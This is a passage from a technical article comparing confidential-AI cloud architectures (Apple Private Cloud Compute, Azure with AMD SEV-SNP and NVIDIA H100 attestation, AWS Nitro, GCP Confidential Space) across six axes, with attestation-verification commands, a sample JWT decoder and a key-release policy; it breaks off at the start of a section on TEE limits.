A DMTF standard (DSP0274) that defines a mutually-authenticated message-exchange protocol between two PCIe endpoints, used in the NVIDIA H100 CC-On architecture to establish a secure session between the host CPU TEE driver and the GPU. The session protects all subsequent control-plane and data-plane traffic and lets each endpoint verify the other's identity and measurements before any sensitive data crosses the PCIe link [@dmtf-spdm] [@nvidia-dev-blog] [@nvidia-nvtrust].

The SPDM handshake itself is specified by DMTF DSP0274 v1.1.0 [@dmtf-spdm] and walks a precise message sequence the relying-party implementer needs to know exists: GET_VERSION (§10.2) negotiates the protocol version; GET_CAPABILITIES (§10.3) negotiates supported capabilities; NEGOTIATE_ALGORITHMS (§10.4) negotiates the cryptographic algorithm family; GET_DIGESTS (§10.7) fetches device-certificate digests; GET_CERTIFICATE (§10.8) retrieves the per-die device-identity certificate; CHALLENGE_AUTH (§10.9) verifies the device's signature over a host-supplied nonce; GET_MEASUREMENTS (§10.11) retrieves the device's runtime measurement vector; and KEY_EXCHANGE (§10.16) establishes the session key over ECDHE on P-384 [@dmtf-spdm]. The first three messages are an ordered prerequisite: per DSP0274 §10.6, no other request is valid until the three-step negotiation completes [@dmtf-spdm].

The negotiated crypto family for the H100 in CC-On mode is SHA-384 / ECDSA-P384 / AES-256-GCM. The device-identity certificate is signed with a per-die ECC-384 hardware-bound key burned into H100 fuses, and revocation runs through the NVIDIA OCSP endpoint -- the GPU-side analogue of the AMD KDS CRL path described later [@nvidia-dev-blog].

sequenceDiagram participant Req as Host CVM (Requester) participant Resp as NVIDIA H100 (Responder) Req->>Resp: GET_VERSION (DSP0274 10.2) Resp-->>Req: VERSION Req->>Resp: GET_CAPABILITIES (10.3) Resp-->>Req: CAPABILITIES Req->>Resp: NEGOTIATE_ALGORITHMS (10.4) Resp-->>Req: ALGORITHMS (SHA-384, ECDSA-P384, AES-256-GCM) Req->>Resp: GET_DIGESTS (10.7) Resp-->>Req: DIGESTS Req->>Resp: GET_CERTIFICATE (10.8) Resp-->>Req: CERTIFICATE (per-die ECC-384) Req->>Resp: CHALLENGE (10.9) Resp-->>Req: CHALLENGE_AUTH (signature over nonce) Req->>Resp: GET_MEASUREMENTS (10.11) Resp-->>Req: MEASUREMENTS Req->>Resp: KEY_EXCHANGE (10.16, ECDHE P-384) Resp-->>Req: KEY_EXCHANGE_RSP

The NVIDIA-side verifier reference moved generations recently: the Python SDK in NVIDIA/nvtrust [@nvidia-nvtrust] is now superseded by nv-attestation-sdk-cpp (also called "NV Attest"), which NVIDIA describes as "a new and improved version of the NVIDIA nvtrust attestation SDK, redesigned to address key limitations" [@nvidia-attest-sdk-cpp]. The C++ SDK is the current canonical reference; the older Python SDK still works but is deprecated. The NVIDIA CC documentation index links both [@nvidia-cc-docs].

The composed attestation -- the AMD SEV-SNP attestation report from the host CVM, joined with the NVIDIA-signed GPU attestation report from the H100 -- is consumable by Microsoft Azure Attestation as a single policy decision [@ms-maa-overview]. Secure Key Release from Azure Key Vault Premium or Azure Managed HSM then gates customer key material on that composite attestation, so the model weights or the user's prompt encryption key are released to the workload only when the entire chain (AMD silicon, AMD firmware, Microsoft hypervisor, customer guest OS, NVIDIA GPU firmware, NVIDIA hardware root of trust) verifies [@ms-maa-overview] [@ms-cc-overview].

flowchart TD A[Customer workload] --> B[Host CVM
AMD SEV-SNP + RMP] B -->|SPDM session, mutual auth| C[NVIDIA H100 NVL
CC-On mode] C -->|Signed GPU attestation| D[NVIDIA NRAS] B -->|SEV-SNP attestation report| E[Microsoft Azure Attestation] D --> E E -->|MAA JWT, x-ms claims| F[Azure Key Vault Premium
or Managed HSM] F -->|SKR release policy check| G[Customer key released
to workload] style C fill:#e6f3ff,stroke:#36c,color:#1a365d style E fill:#fff3e6,stroke:#c63,color:#7b341e The NVIDIA H100 Tensor Core GPU is the first ever GPU to introduce support for confidential computing. -- NVIDIA Developer Blog [@nvidia-dev-blog]

Two breakthroughs. Two cryptographic envelopes. Both prove something about a workload. Both are signed by hardware. Both will satisfy a JWT verifier. And underneath that surface similarity sits a genuinely different epistemological model.

Apple PCC commits, publicly and in advance, to the exact image hash that will be served, and refuses to serve any other. Azure CC-AI does not publicly commit in advance to the bits the verifier runs against -- it produces a JWT that says "I verified what I was given." Both are cryptographic; one is structurally auditable by an independent researcher, the other is a single vendor's word.

This is the aha moment to mark with both hands. "Verify me" is architecturally different from "trust me," even when both produce a JWT.

To turn that distinction into something a reader can carry into procurement, we have to actually walk the six axes. On which do these architectures genuinely differ, and on which do they differ only in implementation strategy?

6. Six Axes, One Difference In Kind

Of the six architectural axes, five are differences in degree -- both PCC and Azure CC-AI do similar things differently. Exactly one is a difference in kind: verifiable transparency of the production fleet. Apple ships a public append-only log of every production node image hash; no other major-cloud confidential-AI substrate ships an architectural equivalent as of mid-2026. The rest of this section walks each axis with the trade-off named, the threat model spelled out, and the primary cited.

Axis 1: Silicon control

PCC is a single-vendor stack end to end. Apple controls the SoC, the SEP, the firmware, the OS, the Swift-based inference runtime, and the bug-bounty program [@apple-pcc-blog]. Apple has not publicly named the specific chip family used in PCC nodes; firmware identifiers and independent analyses point to M2-Ultra-class silicon at launch (firmware identifier ComputeModule14,1 [@appledb-cm14]) with a transition to M5-class silicon during 2026 (identifier J226C [@nine-to-five-mac-m5] [@winbuzzer-m5]), and the Apple Machine Learning Research introduction confirms only that the cloud-side model runs on "Apple silicon servers" without naming a generation [@apple-foundation-models].

Azure CC-AI is a multi-vendor commodity composition by design. AMD provides the EPYC CPU and the AMD Platform Security Processor; Intel provides the Xeon CPU and the TDX module on the alternate Intel SKU family; NVIDIA provides the H100 GPU and the on-die hardware root of trust; Microsoft provides the hypervisor and MAA; the customer chooses the guest OS [@ms-cc-overview] [@ms-sku-nccads] [@nvidia-dev-blog].

The trade-off is direct. Apple's single-vendor stack is operationally simpler and the trust posture is internally consistent, but the trust root collapses to Apple. Azure's multi-vendor stack spreads trust across four independent signers, but no one of them sees the entire system, and the composition itself is a source of complexity.

Axis 2: Hardware root of trust

PCC anchors per-node trust in the Secure Enclave Processor on each Apple-Silicon server. The SEP is bound to an Apple-controlled certificate authority; the SEP signs the node's attestation envelope; the Apple-controlled CA's chain is the root the user's device trusts [@apple-pcc-blog] [@apple-sep-guide].

Azure's hardware root of trust is structurally distributed. A vTPM exposed to the CVM provides one anchor; the AMD Platform Security Processor signs SEV-SNP attestation reports with a per-chip Versioned Chip Endorsement Key (VCEK) [@amd-kds] [@amd-sev-snp-wp]; the NVIDIA on-die RoT signs the GPU attestation; MAA operates as the verifier-of-record that joins these into a single decision artefact [@ms-maa-overview].

A per-die ECDSA signing key derived inside the AMD Platform Security Processor (PSP) from a chip-specific secret fused into the silicon at manufacture. The VCEK signs SEV-SNP attestation reports; the certificate chain runs `VCEK -> AMD SEV signing key (ASK) -> AMD Root Key (ARK)`, with the ARK pinned out-of-band against AMD's published fingerprint and the per-chip VCEK fetched from the AMD Key Distribution Service (KDS) at `kdsintf.amd.com` keyed on the chip ID plus the four TCB-version-vector `*Spl` parameters (`blSpl`, `teeSpl`, `snpSpl`, `ucodeSpl`) parsed out of the 1184-byte attestation report [@amd-kds] [@amd-sev-snp-wp].

The chain itself is short and walkable. The ARK and ASK PEMs are served as a single bundle from the KDS endpoint /vcek/v1/<family>/cert_chain on host kdsintf.amd.com (returning, on the Milan family, an ARK-Milan and SEV-Milan certificate pair issued from AMD Engineering's Santa Clara CA with 25-year validity dated 2020-10-22 [@amd-kds]). The per-die VCEK is served from /vcek/v1/<family>/<chip_id>?blSpl=..&teeSpl=..&snpSpl=..&ucodeSpl=.. on the same KDS host, where the chip ID and the four *Spl TCB-version-vector query parameters are parsed out of the SEV-SNP attestation report itself.

A relying party that wants to verify a SEV-SNP attestation without trusting MAA fetches the chain from KDS, validates the chain against an out-of-band-pinned ARK fingerprint, and checks that the chip ID and TCB version in the report match the chain. The canonical open-source CLI for this is virtee/snpguest [@virtee-snpguest], the active successor to the deprecated AMDESE/sev-tool [@amd-sev-tool].

Axis 3: Attestation surface

PCC produces a per-device attestation envelope cross-checked against the public Transparency Log. The user's device does not just verify the SEP signature; it verifies that the image hash named in the envelope is included in the public log. If the hash is not in the log, the device refuses to forward the request [@apple-pcc-blog] [@apple-pcc-release-transparency].

Azure produces an MAA-issued JWT. The customer's relying party parses the JWT and matches claims. The MAA overview documents the SEV-SNP-specific claims and the platform-vs-guest distinction explicitly [@ms-maa-overview]. For confidential GPU workloads, NVIDIA's NRAS claims about the H100 are joined into the same JWT.

The procurement-grade payoff: a customer can verify SEV-SNP attestation without trusting MAA by running the snpguest workflow directly against the AMD KDS [@virtee-snpguest] [@amd-kds]. Or they can trust MAA's JWT and validate it against the MAA JWKS, trading one trust anchor (AMD's ARK fingerprint) for another (Microsoft's JWKS). Both paths are real; most production customers deploy the MAA path because it is operationally simpler, but the snpguest-based path is what unlocks "we do not have to trust MAA" for a procurement audit.

{` // Demonstrates the structure of an MAA JWT for an AMD SEV-SNP confidential VM. // In production the JWT would be signed by an MAA tenant key and verified // against the tenant's JWKS endpoint. This example just decodes a sample payload.

const sampleMaaJwt = [ // header (base64url) 'eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9', // payload (base64url) -- sample x-ms claims 'eyJ4LW1zLWlzb2xhdGlvbi10ZWUiOiJzZXZzbnB2bSIsIngtbXMtY29tcGxpYW5jZS1zdGF0dXMiOiJhenVyZS1jb21wbGlhbnQtY3ZtIiwieC1tcy1zZXZzbnB2bS1ndWVzdHN2biI6OCwieC1tcy1zZXZzbnB2bS1sYXVuY2htZWFzdXJlbWVudCI6InhEa0...","x-ms-runtime":"e30="}', // signature placeholder 'signature' ].join('.');

function decodeJwtPayload(jwt) { const [, payload] = jwt.split('.'); // base64url -> base64 const b64 = payload.replace(/-/g, '+').replace(/_/g, '/'); return JSON.parse(atob(b64)); }

const payload = decodeJwtPayload(sampleMaaJwt); console.log('TEE family: ', payload['x-ms-isolation-tee']); console.log('Compliance status: ', payload['x-ms-compliance-status']); console.log('Guest SVN: ', payload['x-ms-sevsnpvm-guestsvn']); console.log('Launch measurement:', payload['x-ms-sevsnpvm-launchmeasurement']);

// A Secure Key Release policy would gate key release on claims like: // "x-ms-isolation-tee" == "sevsnpvm" // "x-ms-compliance-status" == "azure-compliant-cvm" // "x-ms-sevsnpvm-guestsvn" >= 8 // matched against the MAA-issued JWT. `}

The MAA path hides KDS fetching, certificate-chain validation, and TCB-rollback policy enforcement from the relying party by emitting a JWT whose `x-ms-attestation-type` claim is `sevsnpvm` and `x-ms-compliance-status` claim is `azure-compliant-cvm`. The relying party then validates against the MAA JWKS instead of pinning the AMD ARK fingerprint. Operationally simpler, but it trades trust in AMD for trust in MAA. A customer that wants a procurement-defensible "we do not have to trust MAA" posture runs the six-step `snpguest` Regular Attestation Workflow directly against the AMD KDS [@virtee-snpguest]. The `snpguest verify certs` step validates the VCEK -> ASK -> ARK chain but cannot detect a substituted ARK; the ARK fingerprint must be pinned out-of-band against AMD's published value before the chain is trusted. The other architectural delta: `snpguest verify attestation` checks the TCB version vector in the attestation report against the version baked into the VCEK certificate, surfacing TCB rollback. Once both checks pass, the relying party has cryptographic evidence the workload is running on a specific physical AMD CPU at a specific firmware level -- without ever talking to Microsoft.

{`# The six-step Regular Attestation Workflow from the virtee/snpguest README.

Each step maps to a wire-level KDS GET except step 1 (which talks to the SNP guest firmware device locally). Run this from inside an SEV-SNP guest VM on Azure (e.g. on a DCasv5 SKU) -- not from the host. Step 1: ask the guest firmware for a fresh attestation report bound to a 64-byte nonce. The report includes chip_id and the four *Spl TCB vector fields the next steps will use to fetch the per-die VCEK.

snpguest report attestation-report.bin request-data.bin --random

Step 2: fetch the ARK + ASK PEM bundle for this CPU family from AMD KDS. Endpoint: GET /vcek/v1//cert_chain on host kdsintf.amd.com

snpguest fetch ca pem milan ./certs

Step 3: fetch the per-die VCEK certificate from AMD KDS, keyed on chip_id and the four *Spl values parsed out of the attestation report. Endpoint: GET /vcek/v1//?blSpl=..&... on the KDS host

snpguest fetch vcek pem milan ./certs attestation-report.bin

Step 4: fetch the current AMD CRL so revoked VCEKs can be rejected. Endpoint: GET /vcek/v1//crl on the KDS host

snpguest fetch crl pem milan ./certs

Step 5: validate the chain locally (VCEK -> ASK -> ARK). IMPORTANT: snpguest cannot detect a substituted ARK. Before running this command, pin the ARK fingerprint out-of-band against AMD's published value.

snpguest verify certs ./certs

Step 6: verify the attestation signature with the validated VCEK and check the TCB version vector in the report against the VCEK certificate. This is the step that surfaces TCB rollback.

snpguest verify attestation ./certs attestation-report.bin `}

Axis 4: Key release and state model

This is where the architectural philosophies diverge most visibly. PCC nodes are stateless by design. There is no customer key material on the node, no key release ceremony, no HSM gating. Apple's first core requirement names this verbatim: "stateless computation on personal user data" [@apple-pcc-blog]. State that needs to persist across requests does so on the user's device, not on the PCC fleet.

Azure treats stateful, customer-managed keys as a first-class architectural primitive. Secure Key Release from Azure Key Vault Premium or Azure Managed HSM gates key release on an MAA-issued JWT whose claims must match the release policy attached to the encrypted key [@ms-cc-overview]. The Microsoft reference confidential-LLM tutorial walks the SKR-from-AKV-Premium flow end to end on a Standard_NCC40ads_H100_v5 SKU [@ms-workshop-llm]. Customer-managed keys, customer-controlled HSMs, and customer audit logs are how regulated buyers reason about confidential workloads, and Azure's design accommodates that workflow directly.

A minimal SKR release policy is a JSON document referencing MAA-issued claims. A simplified example for an SEV-SNP CVM target:

{
  "version": "1.0.0",
  "anyOf": [
    {
      "authority": "<your MAA tenant URL>",
      "allOf": [
        { "claim": "x-ms-isolation-tee", "equals": "sevsnpvm" },
        { "claim": "x-ms-compliance-status", "equals": "azure-compliant-cvm" },
        { "claim": "x-ms-sevsnpvm-guestsvn", "greater-than-or-equals": 8 }
      ]
    }
  ]
}

At unwrap time the HSM evaluates the policy against the JWT the workload presents. Only if every condition is met is the key material released. The policy is bound to the key at creation time and cannot be modified after the fact without rewrapping under a fresh policy.

Axis 5: GPU TEE

PCC uses Apple GPUs that are integrated on the same SoC as the CPU and SEP. By construction they sit inside the same SEP-rooted attestation envelope -- there is no separate cross-vendor PCIe attestation handshake because there is no PCIe handshake to begin with [@apple-pcc-blog].

Azure uses NVIDIA H100 NVL GPUs in CC-On mode, with the architecture described above: on-die RoT, SPDM session, encrypted bounce buffer, NRAS-signed attestation report joined to the SEV-SNP CVM attestation through MAA [@ms-sku-nccads] [@nvidia-dev-blog]. The NVIDIA H100 exposes three confidential-computing modes: CC-Off (the normal non-confidential default; no isolation, no encryption); CC-On (full confidential mode, the only mode that should be used in production); and CC-DevTools (per NVIDIA's developer blog, "a partial CC mode that will match the workflows of CC-On mode, but with security protections disabled and performance counters enabled" [@nvidia-dev-blog]) [@nvidia-cc-docs]. The three modes share a bring-up surface, but only CC-On enforces the full isolation contract.

Note: NVIDIA's documentation is explicit that CC-DevTools weakens isolation specifically so that profiling and debugging tools that need performance-counter access can work [@nvidia-cc-docs]. Production confidential-AI workloads must run in CC-On. Verification step for relying parties: the GPU attestation report includes a mode field; the MAA JWT and the NRAS attestation that compose into it both surface this. A release policy that does not check the GPU mode field can release customer key material to a workload running on a partially-protected GPU. Treat CC-DevTools as a bring-up state, not a deployment state.

AMD's MI300X GPU ships as compute across multiple clouds (Oracle OCI, DigitalOcean, Vultr, Crusoe, TensorWave, Hot Aisle, Seeweb [@mi300x-cloud-list]) but has no production-equivalent confidential-GPU mode at GA on a major commercial cloud as of mid-2026. PCIe TDISP and SEV-TIO Linux support is landing in 2025-2026 kernels, but the GA gap is the load-bearing fact for any procurement that prefers AMD over NVIDIA at the accelerator tier. Azure's confidential GPU offering is H100-only at GA.

A subtle and procurement-critical detail: Microsoft Azure Attestation does not directly attest the GPU. The MAA overview documents the SEV-SNP path and the platform-vs-guest distinction, but the GPU attestation is produced and signed by NVIDIA NRAS, not MAA [@ms-maa-overview] [@nvidia-dev-blog]. The composed MAA JWT carries the NVIDIA-signed GPU attestation as a nested claim. A customer's relying party that wants to verify the GPU attestation against NVIDIA's hardware root of trust must validate the NRAS signature, not the MAA signature, on that nested portion.

This is the double attestation pattern: the SEV-SNP CVM attestation is signed by AMD VCEK; the H100 GPU attestation is signed by NVIDIA's on-die root of trust; MAA composes them into one JWT, but the two signatures must be verified against two different roots. The Azure confidential-computing-cvm-guest-attestation and az-cgpu-onboarding repositories provide the reference patterns for both halves of this verification [@az-cgpu-onboarding].

The double attestation is one place the "MAA is the verifier of record" framing oversimplifies. MAA is the verifier of record for the composition -- but the underlying signatures still come from AMD and NVIDIA. A relying party that wants to refuse a workload running on a TCB-rolled-back AMD CPU plus a CC-DevTools-mode H100 needs to check the AMD TCB version vector against a TCB-version policy (snpguest can do this) and the NVIDIA GPU mode field against a "CC-On only" policy. MAA can be configured to enforce both of these in the release policy, but the customer has to actively write the policy; the defaults will not catch a CC-DevTools-mode H100.

Performance overhead is small. Zhu, Yin, Deng, Almeida, and Zhou (Phala / Fudan / io.net), in arXiv 2409.03992 (v4, November 5, 2024), benchmarked H100 CC-On on vLLM v0.5.4 with the ShareGPT dataset on Llama-3.1-8B-Instruct and report that "for the majority of typical LLM queries, the overhead remains below 7%, with larger models and longer sequences experiencing nearly zero overhead" [@phala-benchmark]. The dominant overhead source is the PCIe encrypted bounce buffer, capped at the ~4 GB/s CPU-encryption ceiling discussed in §5(b); large models amortise that cost across many tokens.

The "below 7%" overhead number is benchmarked on a specific stack (vLLM v0.5.4, ShareGPT dataset, Llama-3.1-8B-Instruct) and depends on sequence length and batch size in non-trivial ways [@phala-benchmark]. Smaller models with short prompts and high batch turnover spend a larger fraction of wall-clock time on the bounce-buffer crossings; larger models with long context windows amortise that cost. Quoting "below 7%" without the workload qualification is misleading.

Axis 6: Network anonymization

This is the axis where the two architectures differ in kind.

PCC routes client requests through a third-party-operated Oblivious HTTP relay -- RFC 9458 [@ietf-rfc9458] -- that strips the client IP address before the request reaches the PCC cluster. This implements one of Apple's five named core requirements, non-targetability: an attacker who compromises the PCC fleet cannot single out a specific user's traffic because the fleet does not know which IP issued which request [@apple-pcc-blog]. Apple's Target Diffusion design layers RSA Blind Signatures (RFC 9474) [@ietf-rfc9474] on top to issue single-use credentials, so even the relay cannot link two requests from the same client.

Azure has no equivalent operator-level anonymization layer. This is intentional in Azure's design: an enterprise customer who knows that traffic originates from their own employees generally does not want to anonymize that traffic from their own audit logs. But it is an axis the two architectures differ on in kind rather than in degree, and worth naming as such -- a procurement reader who needs operator-level anonymization will not get it from Azure CC-AI without building it themselves.

The six axes, side by side

The following table consolidates the comparison.

Axis	Apple Private Cloud Compute	Azure Confidential AI
Silicon control	Single-vendor end-to-end (Apple SoC, SEP, firmware, OS, runtime) [@apple-pcc-blog]	Multi-vendor commodity composition (AMD EPYC, Intel Xeon, NVIDIA H100, Microsoft hypervisor) [@ms-cc-overview] [@ms-sku-nccads]
Hardware root of trust	Per-node SEP bound to Apple-controlled CA [@apple-pcc-blog]	vTPM + AMD PSP / VCEK + NVIDIA on-die RoT + MAA as verifier-of-record [@ms-maa-overview] [@amd-kds]
Attestation surface	Per-device envelope cross-checked against public Transparency Log [@apple-pcc-release-transparency]	MAA-issued JWT with documented `x-ms-*` claims [@ms-maa-overview]
Key release / state	Stateless nodes; no customer keys; no release ceremony [@apple-pcc-blog]	SKR from AKV Premium / Managed HSM gated on MAA JWT [@ms-cc-overview]
GPU TEE	Integrated Apple GPU in same SEP-rooted envelope [@apple-pcc-blog]	NVIDIA H100 CC-On + SPDM + NRAS joined to MAA [@nvidia-dev-blog] [@ms-sku-nccads]
Network anonymization	Third-party OHTTP relay strips client IP [@ietf-rfc9458] [@apple-pcc-blog]	No equivalent operator-level anonymization layer

flowchart LR subgraph PCC["Apple PCC stack"] P1[Apple SoC + integrated GPU] P2[SEP per node
Apple-controlled CA] P3[Transparency Log
append-only public] P4[Stateless node
no customer keys] P5[OHTTP relay
third party] end subgraph AZ["Azure CC-AI stack"] A1[AMD EPYC + NVIDIA H100
multi-vendor] A2[AMD PSP + vTPM
NVIDIA on-die RoT] A3[MAA JWT
x-ms claims] A4[SKR from AKV Premium
customer-managed keys] A5[no operator-level
anonymization layer] end An architectural property whereby every production software image actually serving customer requests is committed in advance to a public, append-only log accessible to any third party. The property requires both that the cryptographic log be publicly auditable (a Certificate-Transparency-style Merkle tree, for example) and that the system refuse to serve requests against images not present in the log. Apple Private Cloud Compute ships verifiable transparency as a first-class architectural primitive; no other major-cloud confidential-AI substrate ships an architectural equivalent as of mid-2026 [@apple-pcc-blog] [@apple-pcc-release-transparency].

Key idea: The two architectures differ in degree on five axes: silicon control, hardware root of trust, attestation surface, key release, and GPU TEE. On the sixth -- verifiable transparency of the production fleet -- they differ in kind. Apple's Transparency Log is not a slightly-better MAA. It is an architectural primitive Microsoft does not ship.

Note: A procurement assumption that PCC and Azure differ only in vendor preference misses the real architectural point. PCC's trust root collapses to Apple alone. Azure's trust root is spread across AMD, Intel, NVIDIA, and Microsoft as four independent signers. A single-vendor compromise on Azure (a leaked AMD VCEK signing key, an NVIDIA firmware bug, an MAA outage) does not collapse the whole stack the way an Apple-CA compromise would collapse PCC. This is a different security posture, not just a different brand. Whether trust diffusion is more valuable than verifiable transparency depends on the regulatory and threat-model context.

Six axes, two architectures, one axis where the divergence is in kind. But Apple PCC and Microsoft Azure are not the only games in town. Where do AWS Nitro Enclaves and Google Cloud Confidential Space fit on the same six axes?

7. Beyond the Two Headliners

If verifiable transparency is the architectural difference, the obvious question is why AWS and Google have not just shipped a Transparency Log too. The short answer is that the three other production substrates each chose a different epistemic model, and shifting any one of them to PCC's model would require rebuilding the trust root from scratch.

AWS Nitro Enclaves

AWS Nitro Enclaves does not anchor in a CPU-vendor TEE at all. Trust is rooted in AWS-as-signer through the Nitro Hypervisor and the Nitro Security Chip [@aws-nitro-hw]. The Nitro System "provides enhanced security that continuously monitors, protects, and verifies the instance hardware and firmware" and offloads virtualization resources to dedicated hardware [@aws-nitro-hw]. A Nitro Enclave is created from a parent EC2 instance and is "isolated from the parent EC2 instance through the Nitro Hypervisor"; per the AWS documentation verbatim, "the Nitro Hypervisor ensures that the parent instance has no access to the isolated vCPUs and memory of the enclave" [@aws-nitro-enclave].

The trust model is different in kind from SGX, SEV, or TDX. Attestation is rooted in AWS's signing key, not in a CPU-vendor key. The Nitro architecture is processor-agnostic over Intel, AMD, and AWS Graviton, which is a different posture again -- the enclave's confidentiality does not depend on a specific silicon vendor's TEE primitive. There is also no published GPU confidential-computing extension for Nitro Enclaves as of mid-2026.

Google Cloud Confidential Space

Google Cloud Confidential Space combines Intel TDX (and AMD SEV / SEV-SNP) with Google Cloud Attestation and Workload Identity Federation. Per the GCA documentation: "Google Cloud Attestation provides a unified solution for remotely verifying the trustworthiness of all Google confidential environments ... The service supports attestation of confidential environments backed by a Virtual Trusted Platform Module (vTPM) for SEV and the TDX Module for Intel TDX" [@gcp-gca]. The overview page describes the multi-party-collaboration use case for PII, PHI, IP, and LLM-interaction data [@gcp-cs-overview].

Google added an interesting wrinkle in 2025: an Intel Trust Authority integration that lets a GCP customer use ITA as a second verifier alongside Google Cloud Attestation. Per the integration documentation: "GCP Confidential Space provides a method for isolating a workload and sensitive data ensuring that data is released only to authorized workloads ... Intel Trust Authority is used to validate the evidence" [@ita-gcp]. A second verifier is not the same architectural primitive as a public transparency log -- it provides cross-checking but not append-only public auditability -- but it is the closest move any other major-cloud confidential platform has made toward PCC's direction as of mid-2026.

Confidential Containers and the orchestration tier

Confidential Containers (CoCo) is a CNCF Sandbox project that wraps Kubernetes pods in confidential VMs running on AMD SEV-SNP, Intel TDX, or IBM Secure Execution [@coco-gh]. Per the project: "Confidential Containers is an open source community working to enable cloud native confidential computing by ... Trusted Execution Environments to protect containers and data" [@coco-gh]. CoCo composes on top of the same Generation-3 silicon Azure CC-AI uses; it does not compete with PCC architecturally because it is at a different layer of the stack.

Around CoCo and the underlying TEEs sits a small set of orchestration-tier vendors that take responsibility for what the raw SKUs do not. The procurement-relevant distinctions between them are sharper than the marketing copy suggests.

Anjuna Seaglass is the cross-cloud unified confidential-deployment plane. It packages AWS Nitro Enclave, Azure CVM, and GCP Confidential Space behind a single command and a customer-supplied policy [@anjuna], with the explicit value proposition of "any cloud, any region, with the only Universal Confidential Computing platform." Anjuna's Seaglass platform supplanted the older Anjuna Northstar nomenclature, but reads the same way to a procurement audit: a single control plane spanning three different silicon vendors' TEE primitives, with a uniform policy DSL on top.

Edgeless Systems' Contrast is the runtime-and-runtime-encryption layer for confidential Kubernetes. Contrast runs confidential container deployments on Kubernetes at scale, built on Kata Containers and the Confidential Containers concept, and provides PKI, mTLS, and encrypted state disks across the deployment [@edgeless-contrast]. The architecture documentation is explicit that "the Contrast Coordinator is the central remote-attestation service for a Contrast deployment" and verifies the Contrast components inside a confidential VM [@contrast-arch] [@contrast-docs]. Contrast is the active successor to Edgeless Constellation, which is now archived ("This repository has been archived ... Edgeless Systems has shifted focus to Contrast, our solution for confidential containers, which addresses the modern needs of confidential cloud workloads" [@edgeless-constellation]). The procurement signal is that customers evaluating Constellation should be redirected to Contrast in any new deployment.

Fortanix is two distinct products that the marketing collapses into one. Fortanix Confidential Computing Manager (CCM) is the orchestration and policy management layer that "is used to securely deploy and manage confidential computing applications using Intel SGX, AMD SEV-SNP, and Intel TDX runtimes" [@fortanix-ccm]. Fortanix Data Security Manager (DSM) is the FIPS 140-2 Level 3 HSM that holds the keys; per Fortanix's DSM page, DSM "delivers Cryptographic Services, Key Management Services, Secrets Management, Tokenization, Code Signing ... powered by Confidential Computing" [@fortanix-dsm] and carries FIPS 140-2 Level 3 certification on the underlying platform [@fortanix-fips]. Procurement teams that need a customer-managed-keys story almost always need both: CCM to orchestrate the confidential-workload deployment, DSM to custody the keys.

CCM is not DSM. CCM is the orchestration plane (which workload runs where, attested by what); DSM is the FIPS 140-2 Level 3 HSM (which holds the keys, releases them on attested workload verification, audits the access). A procurement that asks for "Fortanix" without specifying CCM or DSM is asking for two different products at two different price points with two different compliance postures. The two integrate but they are not the same SKU.

Vendor	Layer	Pick when...
Anjuna Seaglass	Cross-cloud confidential deployment control plane [@anjuna]	You run the same regulated workload on more than one cloud and need one policy DSL spanning AWS Nitro + Azure CVM + GCP Confidential Space
Edgeless Contrast	Confidential Kubernetes runtime with mTLS and encrypted state [@contrast-arch] [@contrast-docs]	You run confidential workloads as Kubernetes pods and want a remote-attestation Coordinator inside the deployment rather than an external SaaS verifier
Fortanix CCM	Confidential-app orchestration on SGX/SEV-SNP/TDX [@fortanix-ccm]	You need centralized policy for which signed confidential workloads run on which TEEs, with audit
Fortanix DSM	FIPS 140-2 Level 3 HSM with attested key release [@fortanix-dsm] [@fortanix-fips]	You need customer-managed keys, FIPS 140-2 L3 custody, and attested-workload-gated release as a single SKU

The third-party tier exists because the raw cloud SKUs sell the substrate but not the operational pattern. Procurement decisions in this category typically pair a cloud SKU with one or two of these orchestration vendors to get something workable for a regulated workload.

Where these fit on the six axes

Substrate	Silicon	Root of trust	Transparency	GPU TEE
Apple PCC	Apple end-to-end [@apple-pcc-blog]	SEP + Apple CA [@apple-sep-guide]	Public Transparency Log [@apple-pcc-release-transparency]	Integrated Apple GPU [@apple-pcc-blog]
Azure CC-AI	AMD + Intel + NVIDIA + MS [@ms-cc-overview]	AMD PSP + NVIDIA RoT + vTPM + MAA [@ms-maa-overview] [@amd-kds]	None (MAA claims only) [@ms-maa-overview]	NVIDIA H100 CC-On [@nvidia-dev-blog]
AWS Nitro Enclaves	AWS-signed, CPU-agnostic [@aws-nitro-hw]	Nitro Hypervisor + Security Chip [@aws-nitro-enclave]	None	None at GA
GCP Confidential Space	Intel TDX + AMD SEV-SNP [@gcp-cs-overview]	vTPM + TDX Module + GCA (+ optional ITA) [@gcp-gca] [@ita-gcp]	None (second verifier via ITA)	None at GA on Confidential Space
Third-party tier (CoCo / Contrast / Anjuna)	Composes on top of cloud SKUs [@coco-gh] [@edgeless-contrast]	Inherits underlying TEE root	None	Inherits underlying GPU TEE

Five substrates, one rough trade-off space. But every one of them rests on silicon, and silicon has its own theoretical limits. What can no TEE-based confidential AI architecture do?

8. What No TEE Can Do

The Confidential Computing Consortium's "A Technical Analysis of Confidential Computing" v1.3 -- the vendor-neutral definitional document both Apple and Microsoft anchor on -- explicitly enumerates side-channels as a residual risk [@ccc-technical-analysis]. This is not a contestable empirical claim. It is the field's own lower bound on what TEE-based confidential AI can deliver. The CCC names what the architecture does not close, in plain text, in the same document that defines what it does.

There are roughly six classes of limit, and the architectures we have walked do not close any of them by construction.

1. Side-channels on shared silicon

The Foreshadow / L1TF, SgxPectre, and Plundervolt cascade [@foreshadow] [@sgxpectre] [@plundervolt] is the historical evidence. The principled extension is direct: any TEE built on shared microarchitectural state -- shared caches, shared branch predictors, shared functional units, shared voltage / frequency control -- inherits a side-channel surface that the architectural threat model does not name. Both Apple's SEP and the AMD-Intel-NVIDIA composition rest on silicon that does not have an architectural primitive that closes this surface. Wojtczuk and Rutkowska's 2009 paper on Intel TXT made the same point fifteen years earlier in a different generation, demonstrating that SMM-based bypasses of TXT were not addressed by TXT's own threat model [@txt-attack]. The cycle keeps repeating.

Even Intel SGX's memory encryption/authentication technology cannot protect against Plundervolt. -- the Plundervolt project page [@plundervolt]

2. Trust-anchor compromise

